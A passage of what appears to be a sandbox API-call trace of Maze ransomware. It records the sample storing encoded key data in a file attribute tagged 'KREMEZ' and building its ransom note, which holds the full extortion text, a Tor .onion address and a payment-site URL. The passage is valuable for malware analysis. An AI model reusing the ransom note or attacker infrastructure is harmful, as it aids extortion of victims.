opQGLaeTCuh5D+OXiUsXA2Ygd3olJfrivH8eyrZPA/oLFa19eWWh1PQktd8D5NsrjvgYjNJqtOPsnyK2KvLeWbqUY9RYE3LD1IbT2UgH55Ehut6m83FzItZdf4gMoU8hRL4IpCCUHjWMANC6p8OMaCgYpUxKBqlhqCtV/ju2IlDJPGh2rx/+55q29Uk6N8I1nW6fSR8XpnoNMtsMWGmbfGiLJM5zs1TWLWKpZFsrdobiUUPRM5WnYBO0OphCz4Yc6H0wjragYCAAAApAAAUlNBMQAIAAABAAEAwb8BJLV51CfuH9fU24z2ryASybhVBtQ0CUPJ5qjDorGLVnme4GgLzEExqll69TyqK2Cwr9PwidT8Dm6JKVahLk2E0hEC93s/8Nr8TctL65vWQUgS9KsyPUeOmqq/gVB36O8IHNxTc4+GT/o5awzuZFNaksBXpUqAtp1cKTf0d+7OsHU25cOg1bveg+TAM5VkLZp50NeKKX1STjBbj9MN9DW+jJhM7WzU72rVMAxtS5L/TP1mBI5/ATGr2ipiwIeBEpmHs8yAwaHKQBHNwIyXlTYxpQBok2Q5wGow7+A+0w9S/elMI005YJPThhslZr+oyh1IFSRNDwrs89aaeDEo4A==") returned 2616 [0051.676] lstrcpyA (in: lpString1=0xf20008, lpString2="KREMEZ" | out: lpString1="KREMEZ") returned="KREMEZ" [0051.676] lstrcpyA (in: lpString1=0xf2000f, lpString2="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" | out: lpString1="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") returned="1ujMBzMtWcg3j3csHFRTbG1OlFICZ2fF0SGosgxjcchu1MDIMly7CBAb4B+bIIeacNA7gqH05ksgSzA1rko+JhzG1aEZOxLV3NYO5/EiAH4Kdwgx07IijKtjA5jxSXRm8yHP9wQ2l9ZNWGniP+Ni5QI0KZKq+Nu+Lm0xfW6xZlgQuJ7gAcARahMWVmOt0CQfcxWXZPx/vAHewaxheaoOi+B6+PBHxvXhL37U/Qpa+KS3uA4mtoYGeQ0pBJhdLI94GnMqjwxH8okQgxbR/diYd4HmSXPVJnAH45cWUxlwWHi17tPcZsNoupdks4kuppSnc4mjJ6fxGCs8Yh9IF4iPQzkJ9479qQUbSlPvw0Q4Wy2ufAlaEdKQKylpinkoykAH9haZuRzjQeLAZ6z2bE/kg2jDl2HXUp7vC3sp2c6dGQR7W7rNOyxIqOYr+K1y7k8OeCfjzkOrSwkdhjPPMdyRpM//AZ/Klo7xajKVRqEDd+HWQvQfdxutG90dsyaFsz4cOThvcqAKiko93ph1UlLusFoSDSoATUqhYbucHlsFyl3KiMgnENT232fraqUcgUPv6WMMwK3L/oU1bQR8gzPDrP9mfq4rpOdVr5Mm5OlL0BqKE9uG4eB8LL8PRqSXCn6xSnvXRelGPBV2M4iWCQ6fNdHlDBb8eYoGdWrmTf5ceGztp8iWOwAvIdTE0VDE/iZPwhbwFA9H58EEZcER9eZDOyPo57GhGD0QKkZrjkakRe+M+zXqRnLMe/FjU3mmx8v1BW1d2ETKGfw+KmeVPDVs36/oWXMh8GDvndaaM7+0zxA4kaLihe2VHwwZraBNH2A7P1jvFMqTaLzSRDyh4BDtHyp0RSyOARjaK9bnyzFqXldxL91VUtNBItsKZvO44rK/c2ENr+RO0a0djv1NsTIzqk0QVttVeMYWV/Kphx5aGKfv6c3RexlncEyJ+q5fabIcuE+yrqYk+AMMC1HHZAZQnJt8JEc7ObLZCFX7GMH8uUqRt4VY6rCTsVCC5Si4/UBR6LLjKBLHXuGVwLpUOrsJjj/3zZJHM08ezZC/uCMZKx6/8LQFz47DFYs3/kG0RvYzxMZcXTMVCZ91MhUfEYtxIaTWQ4/C4f9cgIhnBLbKZcXjBk76LWjAWhA/yRD2EyKi2iFcryMv+U3sVCaXhPjMNjB32Vga3NBtJ4lFrkr2j8D7lwXTJq7F6pqPAP3oRTNmH/em4xUX4Ifx9Y1Ee54/BfonTTd3V6SDG9swfJRm8IvoSOhIqwJbERSM1lb91BrQyNHUPc+ATkYuB3CHxa9h+rJZGaE/MaytdSkjSPZF8xCWBvqIhaLgu2TCMYdJrVtRZyEs+G8R7JzU1zppCj3TMjRisS0C5vcuT6p6npiTEVQZ0RjSFmp57a4onMw4hy7kO98H/yaJfa/9jvnuMg/yOrS/sE0fk7MQUn7QbOy4YVdfEURHMBuzF6RcyH08o7q71oflLpJmqDw5357A6mtWv052N8rpV9PnCXuf4D7I3aWEwb5kDkOg37+MQzcuamSeRMDDU4xKUfszFm99Se+7DU7KHgz/xS9OnreaGVvoyeD6Wo/+2ySbTiofDJ00u9w4pQ8carEc87DMDr6HSi7D0tB4qKfmlOwoeD+wQVdxnH6m+Oe0fpWhk7xBvssGNw4coIY4J4rQx3e0Mda84GHHB8YQN4s5fsDhYijiQatKqvs+eaMdYiMFKqJV9DRoBkStGooClvOh2LwVMPe4aJufA2ECH4zkMHJRZUTqB/bHAacGN2baG8ivcwJsnYj2dsc93tzJDCkmxyIMqbtyqmTRJIvEv4K51A3dZDD2dvx/oHCjbIUfL9N9vr8vnejMVI2XJVafVhAs1C3/CUyOsrhrSH2/BaeNuSjCgEBQH3JVNd5wuQ6V+fFQjCmE23nFn/RXrWhl5gd5fiSFrvPREpiH+BeCGnpiTiTGjIHL7VAYhu7DQ6KVo54swkswxLclqpopQGLaeTCuh5D+OXiUsXA2Ygd3olJfrivH8eyrZPA/oLFa19eWWh1PQktd8D5NsrjvgYjNJqtOPsnyK2KvLeWbqUY9RYE3LD1IbT2UgH55Ehut6m83FzItZdf4gMoU8hRL4IpCCUHjWMANC6p8OMaCgYpUxKBqlhqCtV/ju2IlDJPGh2rx/+55q29Uk6N8I1nW6fSR8XpnoNMtsMWGmbfGiLJM5zs1TWLWKpZFsrdobiUUPRM5WnYBO0OphCz4Yc6H0wjragYCAAAApAAAUlNBMQAIAAABAAEAwb8BJLV51CfuH9fU24z2ryASybhVBtQ0CUPJ5qjDorGLVnme4GgLzEExqll69TyqK2Cwr9PwidT8Dm6JKVahLk2E0hEC93s/8Nr8TctL65vWQUgS9KsyPUeOmqq/gVB36O8IHNxTc4+GT/o5awzuZFNaksBXpUqAtp1cKTf0d+7OsHU25cOg1bveg+TAM5VkLZp50NeKKX1STjBbj9MN9DW+jJhM7WzU72rVMAxtS5L/TP1mBI5/ATGr2ipiwIeBEpmHs8yAwaHKQBHNwIyXlTYxpQBok2Q5wGow7+A+0w9S/elMI005YJPThhslZr+oyh1IFSRNDwrs89aaeDEo4A==" [0051.676] NtSetEaFile (FileHandle=0x2d8, IoStatusBlock=0xc9dfd8, EaBuffer=0xf20000*(NextEntryOffset=0x0, Flags=0x0, EaNameLength=0x6, EaValueLength=0xa38, EaName="KREMEZ", EaValue=0xf2000f*), EaBufferSize=0xa4c) returned 0x0 [0051.681] CryptBinaryToStringW (in: pbBinary=0xf10000, cbBinary=0x782, dwFlags=0x40000001, pszString=0x0, pcchString=0xc9e0d4 | out: pszString=0x0, pcchString=0xc9e0d4) returned 1 [0051.681] VirtualAlloc (lpAddress=0x0, dwSize=0x140c, flAllocationType=0x3000, flProtect=0x4) returned 0xf20000 [0051.681] CryptBinaryToStringW (in: pbBinary=0xf10000, cbBinary=0x782, dwFlags=0x40000001, pszString=0xf20000, pcchString=0xc9e0d4 | out: pszString="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", pcchString=0xc9e0d4) returned 1 [0051.681] lstrlenW (lpString="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/%USERID%\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/%USERID%\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n") returned 2037 [0051.681] lstrlenW (lpString="9cda09f29c354b42") returned 16 [0051.681] StrStrW (lpFirst="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/%USERID%\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/%USERID%\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n", lpSrch="%USERID%") returned="%USERID%\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/%USERID%\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n" [0051.681] VirtualAlloc (lpAddress=0x0, dwSize=0x100e, flAllocationType=0x3000, flProtect=0x4) returned 0xf70000 [0051.682] lstrcpynW (in: lpString1=0xf70000, lpString2="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/%USERID%\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/%USERID%\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n", iMaxLength=925 | out: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/") returned="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the 